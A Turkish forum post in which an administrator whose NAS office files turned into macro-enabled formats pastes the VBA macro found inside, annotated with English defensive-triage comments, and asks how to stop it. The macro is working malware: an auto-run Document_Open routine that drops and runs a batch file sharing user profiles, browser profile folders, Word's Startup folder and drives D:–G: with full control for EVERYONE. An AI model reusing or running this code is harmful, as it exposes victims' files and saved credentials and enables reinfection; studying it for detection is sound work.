Arkadaşlar merhaba,

Kurumumda, NAS sunucusunda bulunan içeriklerimize bir tür virüs bulaştı.
İçeriğinde bulunan WORD, EXCEL, POWERPOINT dosyalarının uzantıları .docm, xmlm ve pptm oldu.
Açtığımızda ise dosya "İçeriği Etkinleştir" uyarısıyla açılıyor.
Dosya içerisindeki makro koduna baktığımda şöyle bir şeyle karşılaştım.

' Analysis notes (defensive triage of the macro as posted):
' - Document_Open is a Word auto-macro: it runs when the document is opened
'   and macro execution has been allowed ("Enable Content").
' - What this Sub does: writes a batch file under C:\WINDOWS, runs it via cmd,
'   then writes a marker file C:\REPORT.TXT.
' - The batch file creates network shares for the user profile, browser
'   profile folders, the Word Startup folder and drives D: to G:, and edits
'   their ACLs so that EVERYONE has full control.
' - Nothing in this Sub renames files or copies the macro into other
'   documents; the .docm/.pptm conversion described in the post presumably
'   comes from code that is not shown here - TODO confirm against the other
'   modules of the sample.
' - Host artifacts to look for: C:\WINDOWS\RUN_AS.BAT, C:\REPORT.TXT,
'   %PUBLIC%\REPORT.TXT, and the share names USRPRFL, CHRM_CCH, FRFX_CCH,
'   MS_STRTP, DSK_D, DSK_E, DSK_F, DSK_G.
Private Sub Document_Open()

    Dim strUserName As String
    
    'Use the Application Object to get the Username
    ' NOTE(review): Application.UserName is the name configured in Office,
    ' not necessarily the Windows logon account - confirm before relying on
    ' this check to decide which hosts were affected.
    strUserName = Application.UserName
    
    ' When the Office user name is exactly "Administrator", skip the batch
    ' file and jump straight to the marker-file section.
    If strUserName = "Administrator" Then GoTo lineCls
    
    ' NOTE(review): "Not" is applied to a String here, which forces a numeric
    ' coercion; there is no On Error handler in this Sub. Whether execution
    ' got past this line on a given host should be established from the
    ' artifacts listed above rather than assumed.
    If Not strUserName Then GoTo lineRn
    
lineRn:
    ' Despite its name, "filesize" holds a file number (handle), not a size.
    Dim filesize As Integer
    Dim FlName As String

    ' Batch file is dropped into the Windows directory; writing there normally
    ' needs elevated rights, so this step may fail for standard users.
    FlName = "C:\WINDOWS\RUN_AS.BAT"

    '~~> get a free file handle
    filesize = FreeFile()

    '~~> Open your file
    ' For Output creates the file or overwrites an existing one.
    Open FlName For Output As #filesize

    '~~> Export Text
    ' Each group below writes three batch lines for one target:
    '   NET SHARE <name>=<path>      publishes the path as an SMB share
    '   CACLS <path> /E /R EVERYONE  edits the ACL, revoking EVERYONE's entry
    '   CACLS <path> /E /G EVERYONE:F  edits the ACL, granting EVERYONE full control
    ' Verify the real share list and ACL state on each host; do not assume
    ' every command succeeded.

    ' Target: the whole user profile directory.
    Print #filesize, "NET SHARE USRPRFL=%USERPROFILE%"
    Print #filesize, "CACLS %USERPROFILE% /E /R EVERYONE"
    Print #filesize, "CACLS %USERPROFILE% /E /G EVERYONE:F"
    Print #filesize, ""
    ' Target: Chrome's default profile folder (browser data; treat saved
    ' credentials and sessions of affected users as exposed).
    Print #filesize, "NET SHARE CHRM_CCH=%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default"
    Print #filesize, "CACLS %USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default /E /R EVERYONE"
    Print #filesize, "CACLS %USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default /E /G EVERYONE:F"
    Print #filesize, ""
    ' Target: Firefox profiles folder under the local AppData tree.
    Print #filesize, "NET SHARE FRFX_CCH=%USERPROFILE%\AppData\Local\Mozilla\Firefox\Profiles"
    Print #filesize, "CACLS %USERPROFILE%\AppData\Local\Mozilla\Firefox\Profiles /E /R EVERYONE"
    Print #filesize, "CACLS %USERPROFILE%\AppData\Local\Mozilla\Firefox\Profiles /E /G EVERYONE:F"
    Print #filesize, ""
    ' Target: Word's Startup folder. Word loads items from this folder at
    ' start, so a world-writable share of it is a persistence/reinfection
    ' risk; inspect its contents during cleanup.
    Print #filesize, "NET SHARE MS_STRTP=%USERPROFILE%\Application Data\Microsoft\Word\Startup"
    Print #filesize, "CACLS %USERPROFILE%\Application Data\Microsoft\Word\Startup /E /R EVERYONE"
    Print #filesize, "CACLS %USERPROFILE%\Application Data\Microsoft\Word\Startup /E /G EVERYONE:F"
    Print #filesize, ""
    ' Targets: the roots of drives D:, E:, F: and G: (one group per drive).
    Print #filesize, "NET SHARE DSK_D=D:\"
    Print #filesize, "CACLS D:\ /E /R EVERYONE"
    Print #filesize, "CACLS D:\ /E /G EVERYONE:F"
    Print #filesize, ""
    Print #filesize, "NET SHARE DSK_E=E:\"
    Print #filesize, "CACLS E:\ /E /R EVERYONE"
    Print #filesize, "CACLS E:\ /E /G EVERYONE:F"
    Print #filesize, ""
    Print #filesize, "NET SHARE DSK_F=F:\"
    Print #filesize, "CACLS F:\ /E /R EVERYONE"
    Print #filesize, "CACLS F:\ /E /G EVERYONE:F"
    Print #filesize, ""
    Print #filesize, "NET SHARE DSK_G=G:\"
    Print #filesize, "CACLS G:\ /E /R EVERYONE"
    Print #filesize, "CACLS G:\ /E /G EVERYONE:F"
    Print #filesize, ""
    ' Report block: the parenthesised ECHO lines are redirected into
    ' %PUBLIC%\REPORT.TXT. "ECHO IPCONFIG" and "ECHO NET USER ..." only print
    ' that text; they do not run those commands. The file therefore records
    ' date, time, user name and profile path, plus the signature string below.
    Print #filesize, "> %PUBLIC%\REPORT.TXT ("
    Print #filesize, "ECHO WORK SUCCESFULLY "
    Print #filesize, "ECHO ---"
    Print #filesize, "ECHO %DATE%"
    Print #filesize, "ECHO %TIME%"
    Print #filesize, "ECHO IPCONFIG"
    Print #filesize, "ECHO NET USER %USERNAME%"
    Print #filesize, "ECHO %USERPROFILE%"
    Print #filesize, "ECHO ---"
    Print #filesize, "ECHO BY YORGOS VASILIS"
    Print #filesize, ")"
    Print #filesize, "EXIT"
    Close #filesize
    
    ' Runs the dropped batch file through cmd. A Word process spawning cmd.exe
    ' is a useful detection point in endpoint/process-creation logs.
    Shell "cmd /c C:\WINDOWS\RUN_AS.BAT"


lineCls:
    ' Reached both by the "Administrator" jump and by falling through after
    ' the Shell call above, so this marker is written on either path.
    
    Dim filesize2 As Integer
    Dim FlName2 As String

    FlName2 = "C:\REPORT.TXT"

    '~~> get a free file handle
    filesize2 = FreeFile()

    '~~> Open your file
    Open FlName2 For Output As #filesize2

    '~~> Export Text
    ' The message is written unconditionally; it does not prove the batch
    ' commands actually succeeded.
    Print #filesize2, "The command applied succesfully"
    Close #filesize2
        
End Sub
Bu YORGOS VASILIS kimse, şu an ona iyi sayıyorum :)

Daha önce bununla karşılaşan var mı?
Sizce bunu nasıl engelleriz?